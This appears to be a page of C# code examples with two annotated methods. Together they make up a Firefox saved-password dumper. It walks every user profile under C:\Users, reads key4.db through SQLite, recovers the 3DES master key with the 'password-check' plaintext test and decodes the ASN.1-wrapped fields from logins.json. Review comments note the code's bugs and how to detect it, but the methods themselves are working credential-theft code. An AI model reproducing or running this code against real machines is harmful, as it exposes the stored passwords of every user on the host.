Exemple #1
        /// <summary>
        /// Decodes one base64-encoded, DER-wrapped field and returns the two hex strings
        /// this method treats as the IV and the ciphertext.
        /// </summary>
        /// <param name="data">UTF-8 bytes of the base64 text to decode.</param>
        /// <returns>
        /// A dictionary with exactly one entry: key = first line after the third
        /// "OCTETSTRING" marker, value = first line after the fourth marker.
        /// </returns>
        /// <remarks>
        /// The values are recovered by splitting the parser's text dump, not by walking
        /// the ASN.1 tree, so the result depends on the exact ToString() layout of
        /// <c>Cryptography.Asn1Der</c>. Nothing is length-checked: input with fewer than
        /// three OCTETSTRING markers fails with an index exception, and invalid base64
        /// fails inside <c>Convert.FromBase64String</c>.
        /// </remarks>
        public static Dictionary<string, string> decodeLoginData(byte[] data)
        {
            // The buffer holds base64 *text*; turn it back into the raw DER bytes.
            string base64Text = Encoding.UTF8.GetString(data);
            byte[] derBytes   = Convert.FromBase64String(base64Text);

            var    parser = new Cryptography.Asn1Der();
            string dump   = parser.Parse(derBytes).ToString();

            // Layout of the dump as recorded by the original author (sample values):
            //
            //   SEQUENCE {
            //       SEQUENCE {
            //            OCTETSTRING F8000000000000000000000000000001
            //            OBJECTIDENTIFIER 2A864886F70D0307          (1.2.840.113549.3.7, DES-EDE3-CBC)
            //            OCTETSTRING 34E18A54D558AB3E                 <- iv
            //            OCTETSTRING D59EC72A4DDB13C2972846426DF2D46F <- ciphertext
            //            OCTETSTRING D59EC72A4DDB13C2972846426DF2D46F
            //                }
            //            }
            //
            // Splitting on the marker leaves the text before the first marker in piece 0,
            // so pieces 2 and 3 are the second and third OCTETSTRING values.
            string[] octetPieces = dump.Split(new[] { "OCTETSTRING" }, StringSplitOptions.None);

            // Each piece still carries the rest of its line(s); keep only the first line.
            string ivHex     = octetPieces[2].Split('\r')[0].Trim();
            string cipherHex = octetPieces[3].Split('\r')[0].Trim();

            return new Dictionary<string, string> { { ivHex, cipherHex } };
        }
Exemple #2
        /// <summary>
        /// Walks every directory under C:\Users, opens the first "*.default" Firefox
        /// profile it finds there, derives a 24-byte key from that profile's key4.db and
        /// passes the key together with the path of logins.json to <c>printCreds</c>.
        /// </summary>
        /// <remarks>
        /// Files read per profile: key4.db (through SQLite, tables <c>metadata</c> and
        /// <c>nssPrivate</c>); the logins.json path is only built here and handed on.
        /// The whole loop sits inside one try block with an empty catch, so the first
        /// exception ends the run silently and no error is reported.
        /// NOTE(review): for detection purposes, what this code does on the host is a
        /// process that is not the browser opening key4.db and logins.json in several
        /// users' profile directories.
        /// NOTE(review): decrypt3DES is called without any password argument, so this
        /// path presumably only succeeds when no Firefox primary password is set;
        /// confirm against decrypt3DES, which is not shown here.
        /// </remarks>
        public static void DumpCreds()
        {
            var    dirPath = "C:\\Users";
            string loginjson;

            // Declared outside the loop: a value set for one profile is still in place
            // when printCreds runs for a later profile whose password check fails.
            byte[] key  = null;
            var    dirs = new List <string>(Directory.EnumerateDirectories(dirPath));

            try
            {
                foreach (var dir in dirs)
                {
                    var Path = dir + "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\";

                    // Accounts without a Firefox profile directory are skipped.
                    if (!Directory.Exists(Path))
                    {
                        continue;
                    }
                    // Only directories matching "*.default" are considered, and only the
                    // first match is used. With no match, ProfilePath[0] throws and the
                    // outer catch ends the whole enumeration.
                    var ProfilePath = Directory.GetDirectories(Path, "*.default");
                    var KeyPath     = ProfilePath[0] + "\\key4.db";
                    loginjson = ProfilePath[0] + "\\logins.json";

                    // The connection is not wrapped in a using block; Close() further
                    // down is reached only when nothing in between throws.
                    var m_dbConnection = new SQLiteConnection("Data Source=" + KeyPath + ";Version=3;");
                    m_dbConnection.Open();

                    // Constant query text, no external input is concatenated into it.
                    string sql = "SELECT item1,item2 FROM metadata WHERE id = 'password'";

                    byte[] global_salt = null;
                    byte[] item2       = null;
                    using (var cmd = new SQLiteCommand(sql, m_dbConnection))
                    {
                        using (var rdr = cmd.ExecuteReader())
                        {
                            // If several rows come back, the last one wins.
                            while (rdr.Read())
                            {
                                global_salt = (byte[])rdr.GetValue(0);
                                item2       = (byte[])rdr.GetValue(1);
                            }
                        }
                    }

                    var asn = new Cryptography.Asn1Der();

                    // parsedData is never used below; the fields are taken from item2 by
                    // fixed byte offsets instead. If the query returned no row, item2 is
                    // still null at this point.
                    var parsedData = asn.Parse(item2);
                    //Console.WriteLine(parsedData);
                    //Asn1.AsnElt asn_AS_REP = Asn1.AsnElt.Decode(item2, false);

                    byte[] entry_salt_byte      = new byte[20];
                    byte[] cipher_text_byte     = new byte[16];
                    byte[] cipher_text_byte_new = new byte[32];

                    // This is very bad hack! If you want to do it properly, read from the parsed ASN1 data!!
                    // The offsets assume one exact DER layout: 20 bytes at offset 21 are
                    // taken as the entry salt and 16 bytes at offset 46 as the ciphertext.
                    // A blob that is shorter makes Array.Copy throw; a blob with a
                    // different layout yields wrong bytes without any error.
                    Array.Copy(item2, 21, entry_salt_byte, 0, 20);
                    Array.Copy(item2, 46, cipher_text_byte, 0, 16);

                    //Console.WriteLine(ByteArrayToString(entry_salt_byte));
                    //Console.WriteLine(ByteArrayToString(cipher_text_byte));

                    var clearText   = decrypt3DES(global_salt, entry_salt_byte, cipher_text_byte);
                    var clearString = Encoding.ASCII.GetString(clearText);
                    //Console.WriteLine(ByteArrayToString(clearText));
                    //Console.WriteLine();

                    byte[] a11  = null;
                    byte[] a102 = null;
                    // Known-plaintext check: the decrypted blob must equal
                    // "password-check" followed by two 0x02 bytes (these look like block
                    // padding left in place; confirm against decrypt3DES).
                    if (clearString == "password-check\u0002\u0002")
                    {
                        var query = "SELECT a11,a102 FROM nssPrivate;";
                        using (var cmd = new SQLiteCommand(query, m_dbConnection))
                        {
                            using (var rdr = cmd.ExecuteReader())
                            {
                                // Last row wins here as well. a102 is read but not used
                                // anywhere later in this method.
                                while (rdr.Read())
                                {
                                    a11  = (byte[])rdr.GetValue(0);
                                    a102 = (byte[])rdr.GetValue(1);
                                }
                            }
                        }

                        // Same fixed-offset extraction as above, now with 32 bytes of ciphertext.
                        Array.Copy(a11, 21, entry_salt_byte, 0, 20);
                        Array.Copy(a11, 46, cipher_text_byte_new, 0, 32);

                        //Console.WriteLine(ByteArrayToString(entry_salt_byte));
                        //Console.WriteLine(ByteArrayToString(cipher_text_byte_new));

                        var keyBytes = decrypt3DES(global_salt, entry_salt_byte, cipher_text_byte_new);
                        //Console.WriteLine("Key: " + ByteArrayToString(keyBytes));
                        //var keyBytes = StringToByteArray(ConvertStringToHex(mainKey));

                        // Keep only the first 24 bytes of the decrypted blob
                        // (presumably the 3DES key length; confirm).
                        key = new byte[24];
                        Array.Copy(keyBytes, key, 24);
                    }
                    m_dbConnection.Close();

                    // Called whether or not the check above passed, so key may be null
                    // or left over from an earlier profile.
                    printCreds(key, loginjson);
                }
            }
            catch
            {
                // Every exception type is swallowed here without logging.
            }
        }